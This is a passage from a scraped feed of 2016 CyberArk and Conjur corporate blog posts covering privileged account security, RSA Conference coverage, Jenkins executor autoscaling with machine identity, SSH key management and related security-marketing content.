  1. Privileged Access Abundance: Because of the large IT teams and other users that require credentials to complete financial transactions, the modern attacker knows these online brokerage institutions have an abundant amount of privileged accounts. Once attackers find a way inside the network, they may continue to make lateral moves, escalate privileges and cause damage before they are even detected.
  1. Wealth of Data: Brokerage applications and systems hold very valuable information, from personal information, to financial trends, to account balances. Access into these systems equates to access into bank accounts, wire transfers and various other monetary transactions.
  1. Too Much to Track: Online brokerage accounts are based on hundreds if not thousands of automated transactions. These transactions occur at high rates of speed and between various systems. The whole business relies on these transactions occurring at the right time with the right information. This makes it easy for an intruder to cripple the entire system with a minor tweak.

Controlling, monitoring and auditing privileged access is vital to mitigating the risks within brokerage organizations. Brokerage organizations can implement a stringent cyber security platform while continuing to provide customers with a scalable product.

By adding proactive security controls along with detection on what really matters, brokerage organizations can mitigate the risks that stem from their business model and the operating environment that is always-on and always moving sensitive, high-risk data around multiple systems.

To learn more about best practices for protecting privileged accounts, download and read “The Three Phases of Securing Privileged Accounts: A Best Practices Guide.”

]]>
Observations from the 2016 RSA Conference https://www.cyberark.com/blog/observations-2016-rsa-conference/ Fri, 11 Mar 2016 20:56:18 +0000 https://www.cyberark.com/blog//

Now that we’ve had a few days to catch our breath, it’s time to reflect upon some of the highlights from the RSA Conference in San Francisco last week. This was the 25th annual conference, and it was attended by more than 40,000 security professionals from more than 700 companies worldwide.

Hot Topics for Conversation

This year, the encryption debate – notably the government’s heated battle with Apple – dominated keynotes, sessions and one-on-one conversations. Today, organizations struggle to find the right balance between security and privacy, and although the rise in breaches and increase in cloud adoption are natural drivers for encryption, hurdles remain for many companies, found a new Ponemon Institute study released during the show.

Analytics was another hot topic. From walking around the show floor, listening to sessions and reading news, there is a clear evolution from discussions about being able to simply detect a security threat – to using behavioral and network analytics to enable organizations to respond.

Other notable topics included the Internet of Things, industrial control systems, artificial intelligence and machine learning. Once again, discussion about privilege was everywhere at RSA – and not just at our booth. Dialogue amongst security researchers, practitioners and vendors alike centered on a common attack link: privileged account exploits. We had a record number of attendees visit the CyberArk booth, seeking ways to mitigate risk and proactively protect against stolen privileged credentials, Kerberos attacks, malicious insiders, Golden Ticket attacks and Pass-the-Hash attacks.

Privileged Threat Analytics

To kick off the show, we unveiled new real-time threat detection and containment capabilities, available via CyberArk Privileged Threat Analytics 3.0, to help organizations secure against cyber attacks that target the Microsoft Active Directory infrastructure. You can find full details and free resources here and check out a 2-minute video here.

Our team talked with our customers and prospects, many of whom were CISOs of their organizations and were often joined by their CIOs – underscoring a larger trend we’re seeing of cyber security becoming a C-level business priority. Attendees lined up to participate in a demo of CyberArk Privileged Threat Analytics, and those who participated were entered into a drawing to win $10K to their favorite charity, which we’ll announce soon. Stay tuned!

Speaking Highlights

In addition to countless conversations and demos at our booth, two of our colleagues had speaking sessions that emphasized proactive protection and threat detection. In the interactive BSides San Francisco talk titled, Scan, Pwn, Next – Exploiting Service Accounts in Windows Networks, CyberArk Labs’ Andrey Dulkin, senior director of cyber innovation, and Matan Hart, security researcher, outlined the ways attackers exploit service accounts in Windows. They also presented research highlighting the exposure of service accounts in real-world networks.

Gerrit Lansing, CISSP, director of consulting services, presented on “Protecting Your King: The Key to Maintaining Control of Your Business” at RSA. Gerrit explored the increasingly common types of Kerberos attacks, including Golden Ticket, and he discussed how privileged account security solutions that combine proactive protection and threat detection can thwart attackers before network takeover is accomplished and trust in the IT infrastructure is broken.

Partner Connections

RSA always presents an exciting opportunity to meet with our technology and channel partners from around the globe to share insights on how to collaboratively help the larger community and our customer to address their most pressing security issues – and this year was no exception.

We are pleased to play a role in several new initiatives launched by our partners, including Tenable Network Security, which unveiled its new Technology Integration Partner Program. We are an inaugural member of the program, which was built to encourage collaborative, innovative solutions to help customers protect against evolving threats.

Additionally, our work with Splunk on the Adaptive Response Initiative was highlighted at the show. As our Executive Vice President Adam Bosnian stated, “A coordinated best-of-breed defense is an important step in effectively combatting the numerous and potentially devastating attacks that companies experience every day.”

Last, but not least, RSA announced new identity assurance and identity governance capabilities in RSA® Via. The interoperability of the CyberArk Privileged Account Security Solution’s proactive protection and detection capabilities with RSA Via Lifecycle and Governance helps to reduce the attack surface by managing privileged user provisioning, entitlements and access certification in a centralized, holistic approach.

Another great show in the books! Thanks to our customers, partners, colleagues and peers for another fantastic RSA Conference. See you next year!

]]>
Scaling Jenkins with Machine Identity https://www.cyberark.com/blog/scaling-jenkins-with-machine-identity/ Wed, 09 Mar 2016 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-jenkins-with-machine-identity/  

Today I’d like to share how we scale our build infrastructure at Conjur. We build and test the software we release on a Jenkins cluster running in AWS. Right now, we have nearly 100 different jobs defined and several different pipelines. We’ve been able to cut down on job maintenance by defining jobs in the Jenkins Job DSL (all our job definitions are open source here). But wasted time adds up if you can’t find a way to automatically launch and configure executor nodes as needed. In this post I’ll describe in detail how we scale Jenkins executors safely and securely.

Goals

Before diving into technical details I want to briefly cover our goals, the reasons why we spent time automating our build infrastructure.

  1. Demand is variable. When putting the finishing touches on a new release, we run more jobs than usual. Pipelines are run more often and at the same time. We need to be able to scale executor capacity up and down easily.
  2. No human in the loop. Launching and configuring nodes by hand distracts engineers from the creative work that only people can do. The only decision someone should have to make is how much capacity they need.
  3. Nodes should automatically bootstrap with a machine identity. Different jobs need different credentials to build and deploy artifacts. Executor nodes need to receive an identity that lets them fetch these credentials.

By automating our build infrastructure, engineers can focus on valuable projects and initiatives. This means less time from idea to implementation of new features. It also keeps the team happier and more engaged. Configuring servers by hand is not exciting work.


1. Define infrastructure as code

Since our infrastructure is in AWS, we use CloudFormation to describe it declaratively. Unfortunately, CloudFormation’s template language is JSON. JSON is great for machines, but not so great to write and edit by hand. To avoid some frustration, we use the CloudFormation Ruby DSL gem to write templates in Ruby. Running the Ruby file generates the JSON for you. We’ve found this to be a more flexible and less error-prone way to define templates.

vs

For Jenkins executors, we define an autoscaling group with the desired capacity as a parameter. Our engineers have access to change this parameter as they need. There are several parameters for this template, including the Host Factory token. We’ll cover that in Step 3. The full template for our Jenkins executors is available on GitHub.

2. Allow executor nodes to register themselves

When Jenkins executor instances first start, they should register themselves with the Jenkins master. Adding and removing nodes manually in the Jenkins UI is a distraction from real work. Registering as an executor via JNLP is not an automatic process. You need a node name to register, which means that the node must already exist in Jenkins. That means you have to create one via the Jenkins UI or API before your newly-launched executor can join your Jenkins node pool. Bummer.

Thankfully, the Jenkins Swarm plugin exists. Using this plugin you can register executor nodes with the Jenkins master without manual intervention. Once the plugin is installed, you can use the swarm CLI to connect to your Jenkins master when an executor starts up. The CLI should be started as the ‘jenkins’ user; otherwise you’ll have issues with permissions in your builds. We created a single-purpose user for authenticating swarm nodes.

Bootstrapping into a swarm looks like this in a userdata.sh script, a script that runs as root when the machine boots up:

One neat thing about CloudFormation parameters is that you can reference them in userdata.sh. You can see this above with ref('NodeName'). We set the default for that parameter to ‘executor’. The Swarm CLI appends nodes with a random string so the resulting executor name you’ll see in Jenkins is something like ‘executor-3d5fe07e’. You can see in the script above that we use the Conjur CLI to fetch the Swarm password. I’ll explain how this works in the next section.

3. Apply machine identity on launch

Our Jenkins executors need access to fetch credentials to run jobs. They also need access to credentials during their bootstrap process. We dogfood here, using Conjur’s Host Factory to apply a unique machine identity and add the node to a build layer. The build layer is granted access to a set of credentials with Conjur policy, declared in YAML.

We created a Host Factory token that allows nodes to bootstrap themselves into the build layer. This token is passed as a CloudFormation parameter and used in ‘userdata.sh’ to run Chef cookbooks that apply machine identity and set up SSH access. There are several ways to bootstrap identity; passing CloudFormation parameters is the best fit for us at the moment.

This step happens before running swarm in step 2. The build layer has fetch access to the credential ‘jenkins/swarm/password’. Once the node is a member of that layer it can fetch the password. Access to this credential is also recorded to an immutable audit log. Here’s an example log from the Conjur UI:

Log Example from the Conjur UI


Our full templates and userdata script for Jenkins can be found on GitHub. By implementing the steps above, our Jenkins executor pool can be scaled up and down by changing the Desired Capacity parameter defined in our CloudFormation template. Adding nodes via Jenkins Swarm just works. When nodes are terminated, they are removed from the Jenkins UI as well. Managing access to credentials can be done at any time without needing to destroy or recreate infrastructure. Our engineers can spend more time working on all of the projects that comprise Conjur and less time managing build infrastructure.

 

]]>
Security Risks and Automated Solutions https://www.cyberark.com/blog/security-risks-and-automated-solutions/ Tue, 08 Mar 2016 18:06:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-risks-and-automated-solutions/  

The Cloud Security Alliance recently released the Treacherous 12, the top cloud computing threats of 2016. Their goal in creating this piece is to help enterprises mitigate risk and come up with security solutions that defend against the most pressing security issues of the coming months. Although security experts make warning against these risks, few companies take actual steps to avoid them, and security breaches occur as a result. Therefore, it is not only important to craft a security plan, but also to follow it, keeping the issues of automation, access management, and secrets rotation in mind. 

CSA Releases Top Cloud Computing Threats of 2016A key theme throughout the entire article is the need for automation. They mention an importance being placed on proper identity, credential, and access management. These are practices that all organizations must be particularly mindful of, as data breaches can arise from a lack of scalable access management and lack of key and secret rotation.

As your enterprise grows, new people will be entering and exiting your infrastructure. As this happens people will gain and lose access to key secrets. It is imperative that you have systems in place to make provisioning and deprovisioning access to secrets easy and scalable. Data breaches often occur when security solutions are not built to scale. The solution you use when you have only ten employees is often very different than the solution you will need when you hit ten thousand. It is relatively easy to know who has access to what when you only have a handful of users, however, this difficulty of this task dramatically increases as teams and infrastructures expand.

An automated security solution that scales is imperative to your security strategy. This way, you don’t need to worry about altering solutions as your company grows, and you can concentrate on innovation and expansion, rather than administrative security tasks. It is crucial to have a definitive understanding of who has access to what, when, or you risk the security of your entire organization. As new users enter and exit your infrastructure, former employees must no longer have access to sensitive data and current employees should only have access to the secrets they need. Automated credential management is necessary in confirming that malicious actors don’t gain unauthorized access to secrets that can damage the organization.

Rotating secrets is crucial to avoiding a cybersecurity breach. Be sure to set policies that dictate when secrets must be rotated, and passwords changed, so that this sensitive data is not vulnerable. Having automated secrets rotation guarantees that employees aren’t bogged down with constantly monitoring these changes, and there are no internal slip-ups when it comes to making sure secrets remain secure.

The piece also cautions enterprises that are looking at new cloud providers and solutions to have a complete understanding of their security protocols, and their daily processes, to make sure these procedures fit with your security goals and regulations. Although additional tools are often necessary, it is crucial to understand the way they work and the systems they use, safeguarding your infrastructure from new vulnerabilities. 

The article states, “Credentials and cryptographic keys must not be embedded in source code or distributed in public facing repositories such as GitHub, because there is a significant chance of discovery and misuse.” It then delivers an example of when hackers found cloud service provider credentials found in a GitHub project. These credentials were then taken misused within a few days. Although there are plenty of examples of security risks coming from a mishandling of secrets, these mistakes are still made, and real data breaches occur because of them.

 

]]>
All About Puppet Camps with Grace Stillar https://www.cyberark.com/blog/all-about-puppet-camps-with-grace-stillar/ Wed, 02 Mar 2016 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/all-about-puppet-camps-with-grace-stillar/  

Puppet Camp Q&A with Grace StillarHere at Conjur, we are big fans of Puppet. Together, Puppet and Conjur help organizations automate and go fast while staying in control with a clear audit trail.

Our love of Puppet explains why we are super excited to attend Puppet Camps Dallas on March 22. Puppet Camps are one-day events during which you can watch presentations delivered by prominent members of the community as well as connect with other users in the area.  

Wanting to get a better understanding of all that Puppet Camps has to offer, I recently sat down with Grace Stillar, Events Marketing Coordinator at Puppet Labs, to ask her some questions about the community events.

Q: What makes Puppet Camps standout?

A:  What stands out about Puppet Camps is that they focus on local users teaching other users how they’ve been integrating Puppet and what works versus what doesn’t. We do around 30 Puppet Camps a year around the world, and for every event the talks are different and based upon that region’s needs. It’s not just pulling one or two folks up on stage, but it’s five or six different talks from users, combined with supporting presentations from Puppet employees. The purpose of Camps is for Puppet to build a space where local users, Open Source and Enterprise alike, can learn from one another.

Q: What can attendees expect to take away from Puppet Camps?

A: Camps are a really good opportunity for folks who are getting started with Puppet to see the variety of ways in which Puppet can be used, and head back to work with a better understanding of what they’re capable of implementing into their infrastructure. Very frequently, attendees mention that they learn about people in their region who are using Puppet and are able to build local relationships with them.  Aside from the learning aspect of Camps, one thing we frequently hear from attendees is that they hear a lot from who else in their region is using Puppet and be able to build local relationships that last outside of the event itself. There’s a Puppet User Group (PUG) in most major cities, and a lot of those conversations continue throughout the year.  

Q: I’m a beginner with Puppet, am I too inexperienced to attend Puppet Camps? What is the average experience level of attendees?

A: Not at all! Puppet Camps are deliberately designed towards adhering to the beginner user. So many folks are adopting Puppet right now, and it’s important that there’s a place for beginners to strengthen their understanding of what they’re capable of doing with Puppet. All the talks at Puppet Camps are technical talks geared towards the practitioner or IT Manager, so even when more intermediate level content comes up, beginners are seeing actual examples of what is possible to do with Puppet.

Q: What is your favorite part of the Puppet Camp community?

A: The connections that are made at Puppet Camps are always delightfully surprising in that we’ll see folks who worked together in the past meeting again and finding out they have a middle ground with both using Puppet, folks who work at the same company in different divisions and weren’t aware of one another’s existence, and new connections between folks who are solving similar problems with their infrastructures. These small connections in the context of a larger event are some of the most beneficial in the long term. 

Q: If an organization wants to speak at Puppet Camp what is your advice in terms of the content they present?

A: Puppet Camps are a great opportunity to share what you’ve learned about Puppet with others, or show the interesting ways you’re using it. Puppet Camp talks are technical, practitioner-focused, and at least 50% about Puppet. We do our best to avoid marketing pitches, while aiming to book talks that are valuable for someone that is looking to use Puppet or is using today.

Q: What is the funniest/craziest thing that has ever happened at Puppet Camps?

A: We strive to hold Camps in interesting and unique locations, such as museums, theaters, art galleries, co-working spaces, and more. This helps keeps things fresh and interesting for us and for attendees. In one instance, we were in a museum theater where we had to work around an archaic AV system by having our Demo presenters type on their laptops from the theater soundbooth at the back of the audience. This meant some of the sessions appeared to have no one actually delivering the presentations, but featured a booming voice accompanying the scrolling Puppet code.  In another instance we were holding a camp in an art gallery and in order to set up a camera to record the talks, we had to climb a ladder to an internal treehouse! All to say, we like to be kept on our toes, and we always make Camps memorable experiences for the employees and attendees alike.

 

]]>
Detect, Alert and Respond with CyberArk Privileged Threat Analytics https://www.cyberark.com/blog/detect-alert-respond-cyberark-privileged-threat-analytics-2/ Tue, 01 Mar 2016 15:07:16 +0000 https://www.cyberark.com/blog//

How do advanced cyber attackers find their way to the heart of your enterprise? In 80 to 100 percent of attack sequences, the preferred pathway is the privileged account, as we’ve seen time and again in high-profile breaches from Sony Pictures to the Office of Personnel Management (OPM).

Once inside the network, attackers make moves to steal credentials, move laterally, and escalate privileges to gain access to their target. In this path, attackers often seek domain administrator credentials to ultimately gain control of Active Directory (AD). Once an attacker has control of AD – the control of the entire organization is in the hands of the attacker.

With access to a domain controller, an attacker can execute a Golden Ticket attack and generate Kerberos tickets. This enables an attacker to achieve unauthorized, and often, unfettered access to the enterprise environment – all while staying completely under the radar by impersonating authorized users. This stealthy impersonation strategy creates numerous challenges for organizations trying to detect and respond to in-progress attacks on the network. Not only can these attacks be incredibly catastrophic to an organization, but they can occur very quickly.

To mitigate the risks of a serious breach, organizations must adopt a security posture that addresses privileged account exposure with multiple layers of protection including proactive controls AND threat detection. Today, we’ve announced new product features that enable organizations to secure the Active Directory infrastructure with proactive controls and threat detection capabilities, available on a single platform.

CyberArk Privileged Threat Analytics 3.0 is a security intelligence solution that detects, alerts and responds to anomalous privileged activity indicating an in-progress attack –including Kerberos attacks. By focusing analytics only on privileged activity instead of analyzing everything on the IT network, CyberArk Privileged Threat Analytics delivers targeted, prioritized alerts on the most critical malicious activity.

Here is an example of Privileged Threat Analytics in-action as it detects a Kerberos Golden Ticket Attack – one of the most severe and damaging attack methods used today:

GT+for+PTA+Datasheet-+FINAL
CyberArk Dashboard: This visual representation of detected incidents over time shows a detected Golden Ticket attack. Critical information such as the malicious user and machine are provided on the dashboard; security analysts can drill-down to get more detailed information on all security incidents.

CyberArk Privileged Threat Analytics can detect in-progress Kerberos attacks by analyzing network traffic and identifying deterministic indications of compromise. With the potential to cause significant damage, these attacks must be detected quickly and responded to immediately. If CyberArk Privileged Threat Analytics detects a Golden Ticket attack, the security team will receive a prioritized alert that is automatically assigned the highest risk score possible, empowering incident response teams to respond immediately. Furthermore, credentials can be automatically rotated to contain the incident and limit the moves of a suspected attacker.

To learn more about CyberArk Privileged Threat Analytics and recommendations for detecting, alerting and responding to the most critical
cyber attacks that could significantly impact your business, please check out the free resources listed below. If you’re in San Francisco this week for the RSA Conference (#RSAC), stop by the CyberArk booth N4301 in the North Expo Center. I’d be happy to give you a demo.

Resources:

 

]]>
6 Things Security Architects Can Learn from the Presidential Election https://www.cyberark.com/blog/6-things-security-architects-can-learn-from-the-presidential-election/ Tue, 01 Mar 2016 18:01:00 +0000 https://cyberarkvx2.wpengine.com/blog/6-things-security-architects-can-learn-from-the-presidential-election/  

In honor of Super Tuesday, we thought it would be a good idea to to take a look at the election process thus far and see what today’s presidential candidates can teach us about communicating with a team.  Whether you’re a conservative, liberal, or somewhere in between there are some clear takeways you can garner from these campaigns, as this election is a perfect example of both effective, and ineffective, communication. For security architects, a main struggle is getting development on board with your security plan. Since communication is crucial to achieve this enterprise-wide focus on security, why not take some tips from some of the best, and worst, orators in the business.

1) Listen

In order to gain support, politicians need to listen to the people in order to truly understand the plight of the constituent. They also need to actively listen in debates so that they can adequately speak to the points made by their fellow candidates. As a security architect, you have to listen to the development team in order to understand why they don’t want to think about security, or what they are worried about happening if a new security plan is introduced.

Learn what tools they like to use, and make sure whatever plan you create integrates well with the things they use everyday. If your plan is crafted around the issues developers voice, it will be a lot easier to get them on board.

2) Have a Plan

Every politician has a plan for how they intend to make things better. If this strategy isn’t well thought out and doesn’t address the concerns of constituents, they will lose voter credibility and confidence. When you introduce a new plan to the organization make sure it is well thought out and easy to understand, that way you will be able to effectively establish your point and clearly answer questions.

Think ahead and make sure your plan addresses the main apprehensions of developers. Be sure to create a program that outlines how important security is to the entire enterprise, the vast impact is has on business, and how it is imperative that security be weaved into the development process.

3) Don’t over-promise

Just as politicians shouldn’t bait voters, you shouldn’t mislead the development team.  It can be tempting to say the new processes you are introducing will be easy to implement and understand, these types of hopeful misrepresentations are especially appealing when you are trying to get developers to agree to the new security plan you are proposing. However, over promising won’t build good faith.

Be honest about the new process and make it clear that you and your team will be there, every step of the way, to ensure implementation goes as smoothly as possible and to answer all questions.

4) Give an accurate timeline

Politicians always present key issues as their chief concern and the first thing they will address when they are elected. However, this is rarely the case, causing a great deal of frustration and lack of trust. Be honest with the development team about how long the new plan will take to implement and how much additional time it will tack on to their day to day innovation. Make it clear that security is vital to the health of the enterprise and that their participation and enthusiasm is key to the organizations success.

5) No Yelling!

Although it’s easy to make snap judgments and yell when you feel your point is not being heard, keep in mind that security is a company wide issue, and every team has their own set of objectives. Although you realize security is important, not everyone will agree with you. The only truly effective way to get others to understand your point is to speak clearly and concisely. Answer questions, speak truthfully, and encourage an open dialogue amongst participants. Take their concerns and address them honestly. Shouting does not make for productive conversations, it causes listeners to put up barriers, and it creates counterproductive animosity that will only make your job as a security professional harder.

6) Don’t Let Your Ego Get in the Way

(Pretty self-explanatory, we all know politicians have some big egos) Yes, you put a lot of thought into the security plan you created, however, there are always better ways to do things. Understand that plans are iterative, and although the security plan you created was well thought out, there are always holes that need to be filled or things that simply don’t work in practice. Continually collect data and re-evaluate your proposal, noticing what is working and what isn’t, taking feedback from your team, and making the processes better.

Getting the enterprise to put security first can be tricky. However, with a clear plan and effective communication, it is possible.

 

]]>
Conjur to Present as SSH Cloud Partner at RSA Conference https://www.cyberark.com/blog/conjur-to-present-as-ssh-cloud-partner-at-rsa-conference/ Mon, 29 Feb 2016 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-to-present-as-ssh-cloud-partner-at-rsa-conference/  

Press Release:

Conjur and SSH will showcase a combined solution that allows customers to extend access management visibility and control beyond the datacenter

WALTHAM, Mass. – Feb. 29, 2016 – Conjur, Inc., provider of Automated Access Management software, will be showcasing their integration with partner SSH Communications Security, the inventor of the SSH protocol, at the 2016 RSA Conference February 29-March 4 at the Moscone Center in San Francisco. This new solution offered by SSH allows teams to extend their existing investments in monitoring, centralized management and access control to new environments and new categories of identities emerging from the adoption of IT automation and cloud services.

Working together, SSH and Conjur will provide customers with a unified model for managing cloud privileged identities and shared service accounts that leverages SSH’s monitoring and credential management. Additionally, the partnership delivers a combined approach to meeting compliance and audit requirements for sessions beyond the on-premise datacenter.

“We have seen consistent interest from our customers in extending what are standard operating practices around access control in their on-premise datacenters to the cloud. Conjur’s integration with SSH’s monitoring and SSH key management system is intended to do just that,” said Elizabeth Lawler, CEO and co-founder at Conjur. “The RSA conference is an ideal place to share our hybrid-cloud solution. This approach ensures that cloud infrastructure and IT automation technologies will have the same level of security and control as more traditional IT environments. By extension of the on-prem system, enterprises will be able to manage access control at an entirely greater scale, velocity and efficiency, without sacrificing the security and accountability they require.”

The SSH and Conjur integrated solution will be available for demonstration at the SSH booth. Conjur CEO Elizabeth Lawler and VP Josh Bregman will be in the South Expo hall, at booth #1341, meeting with customers, delivering demos, exchanging ideas and discussing all the benefits of the SSH and Conjur partnership.

About Conjur
For enterprises that need to protect their infrastructure, Conjur provides proactive security with comprehensive authorization for every cloud, VM, container, service, job and user. Conjur helps companies such as Netflix, Box, and Puppet Labs solve critical operational, compliance, and security challenges that originate in modern automated infrastructure. Headquartered in Waltham, Massachusetts, Conjur is funded by Avalon Partners and Amplify Partners. Visit www.conjur.net and follow @conjurinc on Twitter.

PRContact:
Tracy Wemett
BroadPR
+1-617-868-5031
All trademarks recognized.

 

]]>
7 Sessions You Must See at RSA 2016 https://www.cyberark.com/blog/7-sessions-you-must-see-at-rsa-2016/ Fri, 26 Feb 2016 19:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/7-sessions-you-must-see-at-rsa-2016/  

Must See Sessions at RSA 2016Going to RSA? While you’re navigating your way around the Moscone Center, it can be difficult to figure out where to go or which sessions you should attend. With hundreds of interesting and informative sessions, conducted by industry experts, how can you choose? Although you’ll get some fantastic takeaways from any session you select, we’ve picked 7 sessions we think will be particularly interesting.

Take It to the Cloud: The Evolution of Security Architecture

Monday, February 29, 2016; 3:00PM –  3:50PM; Room 3018W

Led by Dana Wolf, Head of Products at Open DNS, this session covers the new risks associated with SaaS/IaaS adoption and how to diminish these uncertainties using new approaches to security architecture.

DevOps Throw Down with Chris, Gary, Caleb and Shannon 

Tuesday, March 1, 2016;  2:20 PM – 3:10 PM; Room 3006W

This session boasts a panel of experts from Intuit, Bluebox Security, Veracode, and Cigital discuss devops in the real world and what it actually delivers. 

From Pigtails, to Prom, to a Cyber-Career: What about Your Daughter?

Tuesday, March 1, 2016; 1:10 PM – 2:00 PM; Room 130N

Deidre Diamond, founder and CEO of Cyber Security Network,  will discuss the lack of females in cybersecurity and how we can change our viewpoints on IT careers to foster a stronger female presence going forward.

Is Automation the Answer for Security in the Digital World?

Tuesday, March 1, 2016; 2:20 PM – 3:10 PM; Room 2017W

Bret Hartman, VP and CTO at Cisco, will talk about the new security requirements that have emerged from the IoT and whether or not automation of security will help diminish these threats, or make them worse.

Automobiles are Getting Hacked: What’s Next for Transportation Security? 

Tuesday, March 1, 2016; 2:20 PM – 3:10 PM; Room 3004W

Experts from ICIT, IOActive, Venable, and General Motors Company as they discuss the Jeep recall, vehicle connectivity, the issues that it creates, and proposed improvements.

Product Security at Internet Scale 

Tuesday, March 1, 2016; 1:10 PM – 2:00 PM; Room: 3006W or Thursday, March 3, 2016; 11:30 AM – 12:20 PM;  Room 2001W

Michael Murray of Lookout Mobile Security will consider recent data breaches and examine the security of some of the world’s biggest products that contain caches of valuable data, discerning key takeaways from these examples.

Security Issues in Transportation: Need for Collaboration for Solutions

Wednesday, March 2, 2016; 1:00 PM – 1:50 PM; Room: 3014W

Joshua Corman and Kurt Baumgartner investigate research on IoT and car hacking, attack vectors for exploitation of transportation systems, and the need for the automotive industry and cybersecurity to work together.

Plan to attend a session that isn’t on our list? Let us know, we will add it to our schedule and check it out! If the session you plan to attend is full, no worries, head to booth #1341 in the South Expo Hall and say hello to your friends over here at Conjur- In a packed expo hall, who doesn’t love seeing a friendly face?

 

]]>
IDC: Organizations Can’t Afford to Overlook SSH Keys https://www.cyberark.com/blog/idc-organizations-cant-afford-overlook-ssh-keys/ Thu, 25 Feb 2016 13:51:19 +0000 https://www.cyberark.com/blog//

It’s no secret that privileged accounts are exploited in the vast majority of advanced cyber attacks, and these advanced attacks are becoming more and more common. In fact, according to a survey by IDC*, almost 80% of Chief Information Security Officers (CISOs) have had to notify their executive teams of a significant breach.

Yet, as organizations work to better secure their organizations and reduce the privileged account attack surface, Secure Shell (SSH) keys – which provide privileged and often root access to Unix and Linux systems – are often overlooked. According to a new IDC Market Spotlight, “Minimizing Cybersecurity Risk with Vigilant SSH Key Management,” organizations that leave their SSH keys unsecured and unmanaged may inadvertently be providing attackers with complete and undetected access to sensitive data and critical assets.

While many IT security teams presume that the SSH protocol alone is enough to secure access to their sensitive systems, this rationale can create significant risks. As the IDC Market Spotlight points out, just like privileged passwords, “SSH keys can either serve to protect important data or become virtual skeleton keys unlocking the entirety of an organization’s assets.” The only way to ensure the former is to properly secure and manage these privileged credentials.

According to IDC, there are four ways in which organizations often mismanage SSH keys, potentially opening up the organization to a serious breach:

  1. Lack of visibility into SSH keys. SSH keys are often only known to those who create and use them. As a result, many members of the security and risk management teams may be entirely unaware of the SSH key-based privileged access that exists in their environment.
  2. Frequent key sharing between users and systems. Because most SSH key users independently manage their keys, without the help of any tools, SSH keys often become replicated across systems and shared among teams. As a result, it can be incredibly difficult for security and audit teams to clearly track who did what and when.
  3. Manual (if any) key rotation processes. Though most IT administrators understand the importance of credential rotation and revocation, when done manually, this process can be difficult, time-consuming and operationally high risk. If individual keys were accidentally overlooked, the consequences could range from inconvenient user lockouts to major system outages. Yet, by maintaining static SSH keys, an attacker could use a compromised key to gain persistent privileged access to sensitive enterprise resources.
  4. Embedding keys into applications – and forgetting about them. SSH keys are often embedded by developers into applications and scripts to automate authentication. While this helps streamline processes, these keys are often either forgotten about or intentionally left static to avoid the risk of a system outage, should a key be missed in the manual rotation process. Yet, if compromised, an attacker could use these credentials to access critical systems and laterally move through the environment.

To effectively manage the risks associated with SSH keys, IDC recommends that organizations consider automated SSH key management solutions. A centralized solution can help organizations locate existing SSH keys to identify unexpected SSH connections, secure private SSH keys with access controls and strong authentication, rotate key pairs throughout the environment, and audit the use of SSH keys to more easily determine who did what with which key. By strengthening security in an automated way, organizations can better protect their sensitive assets while avoiding the operational risks associated with manual key rotation. In addition, the detailed audit trail provided by SSH key management solutions can help organizations comply with regulatory standards, such as PCI DSS 3.0, and accelerate incident investigation and response times.

Download to the IDC Market Spotlight to learn more about how to minimize SSH key risks, and visit the CyberArk SSH Key Manager webpage to learn how CyberArk solutions can help you secure SSH keys, rotate key pairs and better protect your sensitive assets.

*Source: The State of the “C” in CISO, doc #254283, February 2015

]]>
8 Books Every Security Architect Must Read https://www.cyberark.com/blog/8-books-every-security-architect-must-read/ Thu, 25 Feb 2016 17:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/8-books-every-security-architect-must-read/  

We are always trying to get better at our jobs. Although we can’t put a price on the real, hands on experience of practice, implementation, and and conversations, sometimes we need to rely on additional perspectives to paint a more complete picture.

Experts in the field of security architecture have created some great resources based on their years of learning, calling on both their successes and mishaps in crafting these helpful narratives. Although we aren’t big on “hacks” here at Conjur, as we are firm believers that putting in more work on a project will produce better results, an easy way to “hack” learning so you don’t have to go back for another advanced degree, is to read books that others have spent lifetimes creating.

So, if you’re looking to expand your horizon, absorb some expert knowledge, and crack open a book (or at least skim it), here are 8 stellar picks that every security architect can appreciate.

1. Security Engineering by Ross Anderson

This book teaches readers how to create systems that remain dependable in the face of error or malice, especially in the wake of the latest, more advanced security threats.

2. Designing Security Architecture Solutions by Jay Ramachandran 

 This book dives into system security architecture from a software engineering point of view. The author explains that strong security must be a major principle, and have great impact, in the development cycle. Must Reads for Security Architects

3. Security Metrics: Replacing Fear, Uncertainty, and Doubt by Andrew Jaquith

A Yankee Group Security Expert, Andrew Jaquith teaches readers how to craft proper security metrics based on their organization’s distinctive requirements. The piece is filled with the best practices  to help security architects define, create, and utilize security metrics in the enterprise.

4. Software Systems Architecture: Working With Stakeholders Using Viewpoints and Perspectives by Nick Rozanski and Edin Woods:

Focused on the practitioner and ideal for beginners, this guide helps readers compose and administer effective architectures for information systems. 

5. Working Effectively with Legacy Code by  Michael Feathers

Using relevant and realistic examples, this book helps practitioners to work through the messy problems that accompany legacy code.

6. Beyond Software Architecture: Creating and Sustaining Winning Solutions By Luke Hohmann

Unlike other books on the shelves, this piece deals with the business and project management aspects of software architecture.

7. Software Architecture in Practice by Len Bass, Paul Clements, and Rick Kazman

Structured around the idea of a architecture influence cycle, this book shows the different contexts (such as technical environment, the life cycle of a project, an organization’s business profile, or the architect’s professional practices) in which architecture is influenced or is the influencer.

8. Security Risk Management: Building an Information Security Risk Management Program from the Ground Up by Evan Wheeler

This book focuses on real world, practical information and techniques that can be applied on a daily basis in managing security risks. 

Read any of these books or have another that you recommend? Let us know! 

 

]]>
Security, Agility, and Accountability: A Balancing Act https://www.cyberark.com/blog/security-agility-and-accountability-a-balancing-act/ Wed, 24 Feb 2016 15:26:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-agility-and-accountability-a-balancing-act/  

Many experts in the IT field believe that the battle inside the enterprise between developers, security, and compliance officers will de-escalate. However, at Conjur, we believe this issue is a complex one and is beyond the solution of simply finding common ground.  The challenge is discovering the balance between accountability and agility, and the security tools that can enable and sustain that balance.  

